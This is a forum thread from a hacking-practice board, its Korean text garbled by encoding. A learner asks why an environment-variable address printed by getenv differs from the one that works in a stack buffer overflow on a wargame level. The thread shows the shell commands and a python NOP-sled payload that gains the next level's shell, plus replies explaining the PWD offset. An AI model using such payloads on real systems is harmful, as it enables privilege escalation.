½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tjdalstjr938
   ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ BOF °ø°Ý½Ã Àǹ®Á¡ Áú¹®ÀÔ´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1910 [º¹»ç]


[level15@ftz tmp]$export SCD=`python -c 'print "\xef\xbe\xad\xde"'`

#include <stdio.h>

main()
{
        printf("Address of SHELLCODE : 0x%x\n", getenv("SCD"));
}

[level15@ftz tmp]$ ./abc
Address of SHELLCODE : 0xbffffe87
[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x87\xfe\xff\xbf"';cat) | ../attackme

[level15@ftz tmp]$ (python -c 'print "\x90"*40+"\x7B\xfe\xff\xbf"';cat) | ../attackme
whoami
level16

getenv¸¦ ÀÌ¿ëÇÏ¿© ³ª¿Â ÁÖ¼Ò´Â bffffe87 Àε¥ ½ÇÁ¦ °ø°ÝÀ» ¼öÇàÇÏ·Á¸é bffffe7b¸¦ ÀÔ·ÂÀ» ÇØÁà¾ß °ø°ÝÀÌ ¼öÇà µÇ´õ¶ó°í¿ä.
ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÏ¿©¼­ ¹®Á¦¸¦ Ç®¶§¸¶´Ù °ø°Ý½Ã ÀÌ¿ëÇÏ´Â ÁÖ¼Ò¶û getenvÀÇ Ãâ·Â °ªÀ̶û ´Ù¸£´øµ¥ ÀÌÀ¯¶û ±× »çÀÌ °ª¿¡´Â ¾î¶² °ªµéÀÌ µé¾î°¡°Ô µÇ´ÂÁö ¾Ë·ÁÁֽǼö ÀÖÀ¸½Å°¡¿ä? ¤Ð¤Ð
  Hit : 3037     Date : 2018/01/02 04:12


    
gihacker ȯ°æº¯¼ö¿¡ pwd °¡ Àִµ¥ ÀÌ pwd ´Â ÇöÁ¦ µð·ºÅ丮¸¦ ÀúÀåÇÏ°í ÀÖ´Â º¯¼ö¶ó ½ÇÇàÇÏ´Â À§Ä¡°¡ ´Ù¸£¸é ȯ°æº¯¼öµµ ´Ù¸£°Ô ½ÇÇàµÇ±¸¿ä ´Ù¸¥ º¯¼öµµ Á¶±Ý¾¿ ¹Ù²î´Â °æ¿ì°¡ÀÖ¾î¿ä Çѹø ã¾Æº¸¼¼¿ä 2018/01/02  
tjdalstjr938 ã¾Æº» ¹Ù·Î´Â ÆÄÀÏÀÇ Àüü À̸§ÀÇ ±æÀÌ°¡ °°¾Æ¾ß µÇ¼­ µ¿ÀÏÇÑ À§Ä¡ ¿Í À̸§ ±æÀÌ°¡ °°¾Æ¾ß Á¤È®ÇÑ ÁÖ¼Ò¸¦ ¾òÀ»¼ö ÀÖ´Ù°í ³ª¿À´Âµ¥ ´Ù¸¥ À§Ä¡¿¡¼­ Á¤È®ÇÑ ÁÖ¼Ò¸¦ ã´Â ¹æ¹ýÀ» ¾øÀ»±î¿ä? 2018/01/02  
gihacker Èì env ¸í·É¾î·Î ¹«¾ùÀÌ ´Ù¸¥Áö º¸°í ä¿öÁÖ¸é µÉ°Í°°³×¿ä 2018/01/02  
tjdalstjr938 ´äº¯ °¨»çÇÕ´Ï´Ù. ´öºÐ¿¡ Çϳª ¾Ë¾Æ°©´Ï´Ù. 2018/01/02  
gihacker ¿­°øÇϼ¼¿ä~ 2018/01/02